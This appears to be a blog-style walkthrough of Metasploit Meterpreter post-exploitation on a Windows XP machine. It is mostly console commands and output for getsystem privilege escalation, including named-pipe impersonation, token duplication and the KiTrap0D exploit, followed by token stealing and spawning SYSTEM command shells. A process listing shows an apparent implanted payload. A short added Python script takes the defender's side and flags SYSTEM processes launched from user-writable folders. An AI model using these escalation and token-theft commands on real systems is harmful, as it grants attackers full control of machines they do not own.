meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin; if not admin you can only use -t 4 or -t 0, which will iterate through all options**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey, I want user back!
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell  <-- now uses -t by default
Process 1272 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
Wait, I want a SYSTEM shell again.
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
Or call execute without -t to use your process token:
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
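As an added defender-side example (not code from the original post): the `ps` listing above contains a process running as NT AUTHORITY\SYSTEM whose image sits in the user's profile directory, which is exactly the kind of artifact a triage script over a process listing can flag. The parser below handles that listing's layout, including user names that contain a space; the sample rows are copied from the listing above, and the set of "user-writable" directories is an assumption for illustration.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the layout of the Meterpreter `ps` output above
# (PID Name Arch User Path); rows copied from that listing, not a live host.
SAMPLE_PS = r"""
4 System x86 NT AUTHORITY\SYSTEM
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
"""

# The User column can itself contain a space ("NT AUTHORITY\NETWORK SERVICE"),
# so the path is recognised by its shape (drive letter or leading backslash)
# instead of splitting the row on whitespace. Path is optional (see PID 4).
ROW = re.compile(
    r"^(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+(?P<user>.+?)"
    r"(?:\s+(?P<path>[A-Za-z]:\\\S.*|\\\S.*))?$"
)

# Assumed list of directories an interactive user can write to; a SYSTEM
# process whose image lives there deserves a look.
USER_WRITABLE = ("\\documents and settings\\", "\\users\\", "\\temp\\")
PRIVILEGED = ("NT AUTHORITY\\SYSTEM",)


def parse_row(line: str) -> Optional[Dict[str, str]]:
    """Parse one `ps` row; returns None for header, ruler or odd rows."""
    m = ROW.match(line.strip())
    return m.groupdict() if m else None


def parse_ps(listing: str) -> List[Dict[str, str]]:
    """Parse a whole listing, silently skipping rows that are not processes."""
    rows = (parse_row(line) for line in listing.splitlines())
    return [r for r in rows if r]


def suspicious_system_processes(listing: str) -> List[Tuple[int, str, str]]:
    """(pid, name, path) for SYSTEM processes started from user-writable dirs."""
    hits = []
    for r in parse_ps(listing):
        path = (r["path"] or "").lower()
        if r["user"] in PRIVILEGED and any(d in path for d in USER_WRITABLE):
            hits.append((int(r["pid"]), r["name"], r["path"]))
    return hits


if __name__ == "__main__":
    for pid, name, path in suspicious_system_processes(SAMPLE_PS):
        print(f"SYSTEM process from user-writable path: pid={pid} {name} {path}")
```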
How is it possible?
Is it publicly available?
svn up!